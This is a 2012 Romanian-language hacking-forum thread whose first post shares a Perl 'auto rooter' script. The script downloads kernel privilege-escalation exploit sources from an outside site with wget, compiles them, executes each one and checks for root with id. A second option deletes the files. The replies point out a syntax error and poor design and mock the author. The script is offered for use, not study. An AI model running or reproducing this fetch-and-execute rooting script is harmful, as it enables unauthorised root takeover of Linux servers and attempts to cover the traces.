bebemic Posted February 16, 2012 Report Posted February 16, 2012 #!/usr/bin/perl#Coded By CrosS ( 2011 Linux Auto r00t3r )print "###########################################################\n";print "# (Beta 1.0 ) Auto rooter by CrosS #\n";print "# Usage : #\n";print "# perl $0 root => To root #\n";print "# perl $0 del => Delete Exploit #\n"; print "# #\n";print "# as R00TW0RM - Private Community is back #\n";print "# so Releasing 2011 auto rooter =) #\n";print "# in case of error mailto: mr.0x0day[AT]live.com #\n";print "# #\n";print "# Thanks to: r0073r and L0rd CrusAd3r #\n";print "# http://www.r00tw0rm.com/1337 #\n";print "###########################################################\n\n\n";if ($ARGV[0] =~ "root" ) {system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.18.c");system("gcc 2.6.18.c -o 2.6.18");system("chmod 777 2.6.18");system("./2.6.18");system("id");system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.33.c");system("gcc 2.6.33.c -o 2.6.33");system("chmod 777 2.6.33");system("./2.6.33");system("id");system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.34.c");system("gcc -w 2.6.34.c -o 2.6.34");system("sudo setcap cap_sys_admin+ep 2.6.34");system("./2.6.34");system("id");system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37-rc2.c");system("gcc 2.6.37-rc2.c -o 2.6.37-rc2");system("chmod 777 2.6.37-rc2");system("./2.6.37-rc2");system("id");system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37.c");system("gcc 2.6.37.c -o 2.6.37");system("chmod 777 2.6.37");system("./2.6.37");system("id");system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.43.2.c");system("gcc -w 2.6.43.2.c -o 2.6.43.2");system("sudo setcap cap_sys_admin+ep 2.6.43.2");system("chmod 777 2.6.43.2");system("./2.6.43.2");system("id");system("wget http://www.r00tw0rm.com/2o11Expl01t/3.0.c");system("gcc 3.0.c -o 3.0");system("chmod 777 3.0");system("./3.0");system("id");}if ($ARGV[0] =~ "del" ){print "All Exploit deleting ...\n";system("rm 2.6*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*");lol..scuze..This domain name expired on Feb 14 2012 12:11AM dar se poate modifica cu localele pe care le aveti deja Quote
t0rque Posted February 16, 2012 Report Posted February 16, 2012 Missing right curly or square bracket at autorooter line 60, at end of linesyntax error at autorooter line 60, at EOFExecution of autorooter aborted due to compilation errors.ai uitat sa copiezi si ultima } Quote
co4ie Posted February 16, 2012 Report Posted February 16, 2012 Ca sa functioneze trebuie sa ai cat de cat acces ... ca sa compilezi si sa poti da permisiuni de executare la un fisier ... Quote
aelius Posted February 17, 2012 Report Posted February 17, 2012 system("gcc 2.6.37.c -o 2.6.37");system("chmod 777 2.6.37");Asta cred ca vinde castraveti la piata, nu e programator. De ce saracia te-ai chinui sa faci perl cu system() cand poti face bash direct. Si de ce mai da chmod 777 la binarul rezultat in urma compilarii ? Are deja permisiunile ok (755). Acolo da "system("id");" dupa executia fiecarui exploit insa nu are vreo variabila sa verifice daca are deja uid 0, caz in care daca esti uid 0, dupa primul expl. local, celalalte sunt executate la rand de pomana (si pot periclita intregul sistem, fiind rulate ca root)Cyber Laba domne ... Quote
backdoor Posted February 17, 2012 Report Posted February 17, 2012 Auto root-erul tau nu face 2 bani, script kiddie ! Oricum frumoasa intentia. Quote